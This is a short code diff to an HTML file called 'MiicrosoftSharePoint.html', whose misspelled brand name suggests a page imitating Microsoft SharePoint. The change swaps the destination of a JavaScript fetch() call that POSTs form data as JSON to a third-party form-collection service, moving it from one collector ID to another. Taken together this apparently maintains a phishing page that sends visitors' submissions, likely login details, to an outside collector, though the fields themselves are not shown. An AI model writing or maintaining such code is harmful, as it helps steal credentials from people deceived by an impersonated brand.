--- a/MiicrosoftSharePoint.html
+++ b/MiicrosoftSharePoint.html
@@ -190,7 +190,7 @@
                 };
 
                 try {
-                    const response = await fetch('https://submit-form.com/YuH728Ott', {
+                    const response = await fetch('https://submit-form.com/rUwxXdt9A', {
                         method: 'POST',
                         headers: {
                             'Content-Type': 'application/json'
